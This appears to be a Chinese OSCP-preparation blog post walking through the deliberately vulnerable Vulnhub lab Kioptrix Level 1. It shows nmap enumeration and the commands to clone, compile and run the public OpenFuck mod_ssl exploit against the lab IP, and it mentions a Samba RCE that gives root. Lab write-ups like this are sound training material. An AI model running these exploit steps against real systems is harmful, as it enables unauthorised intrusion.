OSCP备考_0x01_Vulnhub靶机_Kioptrix: Level 1 (#1)

Ethan医生3个月前靶场108


名称说明
靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.171


信息收集

使用arp-scan进行扫描查看存在主机

image.png

发现有个 192.168.233.254, 使用nmap进行端口扫描




发现出现mod_ssl有漏洞 搜索漏洞是否有EXP

根據nmap掃描結果是發現有使用mod_ssl/2.8.4,透過Google確定版本漏洞,並且有相關POC可以利用。

image.png

Exploit

根據這個Github的提示,在complie這支poc之前需要先安裝一些libery。

git clone https://github.com/heltonWernik/OpenFuck.git
apt-get install libssl-dev
gcc -o OpenFuck OpenFuck.c -lcrypto
./OpenFuck

基本上就編譯完成了,過程中如果出現warning不要理他,那些東西都是不影響poc執行的,照著Poc裡面的提示就可以把機器打下來了。


image.png

进入后获取的是apache用户

sudo ./OpenFuck 0x6b 192.168.233.171 -c 40

uname -a

Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown




使用SAMBA漏洞

可以抓包查看SAMBA版本号

然后使用searchsploit samba

image.png



然后发现有RCE方法 执行后拿到Root权限

image.png

思路总结

一、主机发现、端口扫描

  • 22(ssh):只能尝试爆破

  • 80(http):优先考虑

  • 111(rpc):放最后

  • 139(NetBIOS/SMB):特定EXP

  • 443(https):优先考虑

  • 1024:动态端口的开始,许多程序并不在乎用哪个端口连接网络,它们请求系统为它们分配下一个闲置端口。

二、服务枚举。

  • Apache 1.3.20

  • Samba 2.2.1a(MSF探测版本)

  • mod_ssl 2.8.4

  • OpenSSL 0.9.6b

三、发现web站点是apache默认页面并无太多有价值信息,则着手从各个服务出发,在对SMB服务进行枚举后发现存在共享,尝试无密码访问却无权浏览文件,则将攻击方向转变为各个服务,通过对公开漏洞进行搜索,并尝试了Samba服务和Apache服务的四个漏洞利用,均拿到了root权限。最后,这台靶机不难但也要做出反思:

  • 对于攻击者而言,一个小小的泄露可能会引起他的攻击兴趣。

  • 思考自己的操作是否会引发重大安全事件(例如严重的溢出)

  • 需要随时盘点获得的信息,并对其进行判断,重要的是思路的拓展和细节的把控,即使走不通的也有其中的尝试和思考。(Apache mod_ssl/Apache-SSL 远程缓冲溢出)






相关文章

OSCP备考_0x38_HackThBox靶机_Windows_Devel

OSCP备考_0x38_HackThBox靶机_Windows_Devel

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.198 (扫描TCP)使用ftp进行连接ftp 10.129.254.198 2...

OSCP备考_0x06_HackThBox靶机_Linux_Sense

OSCP备考_0x06_HackThBox靶机_Linux_Sense

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.131.103 (扫描TCP)上面的信息提供了直接跳转到443端口nmap -sU --top-ports...

OSCP备考_0x48_HackThBox靶机_Windows_Chatterbox

OSCP备考_0x48_HackThBox靶机_Windows_Chatterbox

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.244.125 (扫描TCP)135/tcp (MSRPC): Microsoft远程过...

OSCP备考_0x12_HackThBox靶机_Linux_irked

OSCP备考_0x12_HackThBox靶机_Linux_irked

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.213.7 (扫描TCP)nmap -sU --top-ports 100 10.129.213....

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

fusenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)nslookup fabricorp.local ...

OSCP备考_0x17_Vulnhub靶机_joy

OSCP备考_0x17_Vulnhub靶机_joy

名称说明靶机下载链接攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.233.184arp-scan 192.168.233.1/24nmap -p- 1...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。